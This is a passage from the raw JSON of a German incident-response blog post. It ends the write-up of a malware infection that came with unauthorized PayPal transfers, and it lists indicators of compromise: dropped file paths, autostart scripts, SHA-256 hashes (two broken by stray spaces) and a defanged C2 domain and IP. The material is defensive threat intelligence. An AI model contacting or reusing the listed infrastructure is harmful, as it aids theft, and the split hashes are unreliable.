wahrscheinlich, dass Social Engineering im Spiel war. Ein b\u00f6sartiger Web-Download oder eine b\u00f6sartige E-Mail sind die wahrscheinlichsten Szenarien.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Indicators_of_Compromise\"><\/span>Indicators of Compromise <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Host-basierte Artefakte  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Dateipfade<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Temp\\svchoss.exe<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\python.exe<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\we.bin<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\a.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\x.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_ctypes.pyd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\libffi-8.dll<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\python3.dll<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_zstd.pyd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_lzma.pyd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_bz2.pyd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\libffi-8.dll<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_ctypes.pyd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\vcruntime140.dll<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\python315.dll<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Benutzer\\admin\\AppData\\Roaming\\nuil.bat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Benutzer\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Startmen\u00fc\\Programme\\Autostart\\12.bat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Benutzer\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Startmen\u00fc\\Programme\\Autostart\\esae.bat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Benutzer\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Startmen\u00fc\\Programme\\Autostart\\rech.bat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Benutzer\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Startmen\u00fc\\Programme\\Autostart\\esae.vbs<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Hashsummen<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">a57a08802002bb2e67f33143a17e027d07022e2aa3743840c8f18ced2c2b5217<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">7a58c3106c38dbd56dda242deac02eea9bef8f064e62e6 435849048fd036ceb1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">3d9239e8ed6b4f29f5754c934749110491ba821c31d758c2bc3e571c1375798a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">40ef98e3251741b57792a42246eb238c4c12936d2db00bef2b8389b834ce7b52<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">3483344d12e26ceb42c9c63d1d941c5309dd34d37ec b449922ef85647b726f58<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Netzwerkbasierte Artefakte  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Domains<\/em> <\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a  href=\"https:\/\/syracuse-seeks-wilson-row.trycloudflare%5B.%5Dcom\"  dpc-external=\"true\"  target=\"_blank\"  rel=\"nofollow\" >https:\/\/syracuse-seeks-wilson-row.trycloudflare[.]com<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>IP-Adressen<\/em> <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">43.156.63[.]124  <\/p>\n","protected":false},"excerpt":{"rendered":"<p>Wachsamkeit und Vorsicht sind in der Cybersicherheit von entscheidender Bedeutung. Wenn wir diese Binsenweisheit wiederholen, denken die meisten von uns an Social-Engineering-Angriffe und daran, den Benutzern beizubringen, wie sie eine Phishing-E-Mail oder einen Betrugsanruf erkennen k\u00f6nnen. Ein aufmerksamer Benutzer kann jedoch auch wertvolle Erkenntnisse zu einem eher technischen Aspekt liefern.<\/p>\n<p>Ein k\u00fcrzlich aufgetretener Vorfall wurde gemeldet, als der Benutzer \u201eseltsame schwarze Fenster\u201d auf dem Desktop bemerkte und Screenshots davon machte. Dies ging einher mit PayPal-\u00dcberweisungen vom Konto des Benutzers, die nicht von diesem autorisiert worden waren.<\/p>\n","protected":false},"author":41,"featured_media":64106,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[80,66],"tags":[],"dpc_coauthors":[],"class_list":["post-64107","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-incident-response","category-techtalk"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.secuinfra.com\/de\/wp-json\/wp\/v2\/posts\/64107","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.secuinfra.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.secuinfra.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.secuinfra.com\/de\/wp-json\/wp\/v2\/users\/41"}],"replies":[{"embeddable":true,"href":"https:\/\/www.secuinfra.com\/de\/wp-json\/wp\/v2\/comments?post=64107"}],"version-history":[{"count":3,"href":"https:\/\/www.secuinfra.com\/de\/wp-json\/wp\/v2\/posts\/64107\/revisions"}],"predecessor-version":[{"id":64134,"href":"https:\/\/www.secuinfra.com\/de\/wp-json\/wp\/v2\/posts\/64107\/revisions\/64134"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.secuinfra.com\/de\/wp-json\/wp\/v2\/media\/64106"}],"wp:attachment":[{"href":"https:\/\/www.secuinfra.com\/de\/wp-json\/wp\/v2\/media?parent=64107"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.secuinfra.com\/de\/wp-json\/wp\/v2\/categories?post=64107"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.secuinfra.com\/de\/wp-json\/wp\/v2\/tags?post=64107"},{"taxonomy":"dpc_coauthors","embeddable":true,"href":"https:\/\/www.secuinfra.com\/de\/wp-json\/wp\/v2\/dpc_coauthors?post=64107"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}